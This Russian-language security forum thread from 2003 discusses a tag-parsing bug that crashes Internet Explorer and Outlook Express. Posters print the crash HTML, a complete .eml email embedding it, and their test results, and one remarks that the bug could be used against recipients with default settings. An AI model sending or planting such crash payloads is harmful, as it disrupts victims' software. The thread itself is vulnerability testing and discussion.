Легенда:
 новое сообщение
 закрытая нитка
 новое сообщение
 в закрытой нитке
 старое сообщение
|
- Напоминаю, что масса вопросов по функционированию форума снимается после прочтения его описания.
- Новичкам также крайне полезно ознакомиться с данным документом.
| | | | | | |
Если само письмо было написано в формате HTML... 12.05.03 17:34 Число просмотров: 1138
Автор: HandleX <Александр М.> Статус: The Elderman
|
|
...и в этом HTML есть вышеуказанный зловредный код, то аутглюк должен красиво упасть, потому что при просмотре такого письма от подгружает IE как in-place OLE (ActiveX), и скорее всего в своём же адресном пространстве, поэтому исключение ослика завалит аутглюк...
|
|
<site updates>
|
Пользователям IE опять пора бояться 07.05.03 10:41
Publisher: cybervlad <cybervlad> Статус: Elderman
|
Пользователям IE опять пора бояться
The Inquirer http://www.theinquirer.net/?article=9344
Обнаруженная ошибка при разборе тегов приводит к аварийному завершению программы. Теперь для скрипт-кидди есть развлечение - рассылать e-mail в html-формате со злобными тегами...
Полный текст
|
|
Пользователям IE опять пора бояться 07.05.03 14:46
Автор: zoonoid Статус: Незарегистрированный пользователь
|
<html>
<!-- > <input type code>
<body>
</body>
</html>
Спасибо дяде БГ :)
|
| |
Не факт. 07.05.03 23:33
Автор: JINN <Sergey> Статус: Elderman
|
> <html>
> <!-- > <input type code>
> <body>
> </body>
> </html>
> Спасибо дяде БГ :)
ИЕ 6.0 + патчи q319182, q324929 - ослик "не падает", умирает лишь окно, в котором был открыт crash.html.
|
| | |
А этого мало, что-ли? :)) 08.05.03 09:49
Автор: Sandy <Alexander Stepanov> Статус: Elderman
|
|
|
| | | |
Ну и толку? 08.05.03 09:54
Автор: ZloyShaman <ZloyShaman> Статус: Elderman
|
|
Если выключено подтверждение на закрытие окна, то можно и window.close использовать ;))))
|
| | | | |
Одно дело окно просто закрылось, а другое - когда в ошибку выпало! :) 08.05.03 12:36
Автор: Sandy <Alexander Stepanov> Статус: Elderman
|
|
|
| | | | | |
а АутГлюк как? 12.05.03 07:54
Автор: zoonoid Статус: Незарегистрированный пользователь
|
А может кто сможет этот код в HTML в АутГлюк вставить и рассказать падает он или нет?
А то у меня ломает винды ставить
|
| | | | | | |
Если само письмо было написано в формате HTML... 12.05.03 17:34
Автор: HandleX <Александр М.> Статус: The Elderman
|
|
...и в этом HTML есть вышеуказанный зловредный код, то аутглюк должен красиво упасть, потому что при просмотре такого письма от подгружает IE как in-place OLE (ActiveX), и скорее всего в своём же адресном пространстве, поэтому исключение ослика завалит аутглюк...
|
| | | | | | | |
Сегодня исследовал поведение этого почтовика... Аутглюк умирает, но не сдаётся ;-) 13.05.03 22:09
Автор: HandleX <Александр М.> Статус: The Elderman
|
Если текст (ниже) вы сохраните в простом текстовом формате в файл с расширением *.eml, то сами сможете всё это посмотреть...
From: "Alex" <somebody@mail.ru>
To: <somebody@pisem.net>
Subject: =?koi8-r?B?6MXMzM8h?=
Date: Wed, 14 May 2003 00:37:03 +0700
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="----=_NextPart_000_0005_01C319B0.F09A7A20"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1158
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165
This is a multi-part message in MIME format.
------=_NextPart_000_0005_01C319B0.F09A7A20
Content-Type: text/plain;
charset="koi8-r"
Content-Transfer-Encoding: quoted-printable
Hi!
------=_NextPart_000_0005_01C319B0.F09A7A20
Content-Type: text/html;
charset="koi8-r"
Content-Transfer-Encoding: quoted-printable
<HTML><HEAD>
<META http-equiv=3DContent-Type content=3D"text/html; charset=3Dkoi8-r">
<META content=3D"MSHTML 6.00.2800.1170" name=3DGENERATOR>
<STYLE></STYLE>
</HEAD><FONT face=3DArial><FONT size=3D2>
<!-- > <INPUT TYPE CODE>
<BODY>
<DIV>Hi!</DIV></BODY></HTML></FONT></FONT>
------=_NextPart_000_0005_01C319B0.F09A7A20--
---
Ну и дальше в мелкософт как чувствовали, что может произойти такое. Если это письмо проводником с помощью drug&drop бросить во «входящие», то аутлук падает с ошибкой. Можно себе представить, что аутлук при повторной загрузке сразу открывает папку «входящие», а там опять это письмо ;-) Но вот что он показывает вместо письма в этом случае:
«Outlook Express did not shutdown correctly
The last time you ran Outlook Express it did not exit correctly. In case this was due to a problem with the last message you were viewing, the message is not being shown».
так что в M$ тоже не лохи ;-)
|
| | | | | | |
а АутГлюк как? 12.05.03 13:50
Автор: JINN <Sergey> Статус: Elderman
Отредактировано 12.05.03 13:53 Количество правок: 1
|
> А может кто сможет этот код в HTML в АутГлюк вставить и
> рассказать падает он или нет?
> А то у меня ломает винды ставить
Создал в БАТе письмо, приаттачил файл crash.html, отправил себе же, забрал аутлуком почту, ткнул в аттач, ответил "Да, я хочу открыть вложение", открылось окно IE и тут же "упало" с сообщением
"Программа выполнила недопустимую операцию и будет закрыта" Сведения :
Программа EXPLORER вызвала сбой при обращении к странице памяти
в модуле SHLWAPI.DLL по адресу 0167:70bf4fee."
Отвечаем "Закрыть", получаем ещё одно сообщение "Произошла ошибка в IE. Работа обозревателя будет завершена. При повторении ошибки перезагрузите компьютер".
Жмём "ОК"- "зависнувшее" окно закрывается, работу можно продолжать-)
Добавлю : ВСЕ остальные окна и приложения при этом работают без проблем, в частности половина этого сообщения была написана при висящем предупреждении об ошибке.
Версия Аутлук-а 6.00.2600
Так что если повезёт найти адресата, у которого все настройки дефолтовые, типа "ВСЁ СРАЗУ открывать и ни о чём не предупреждать", баг можно использовать.
|
|
|
подробно о проекте
Анализ криптографических сетевых...
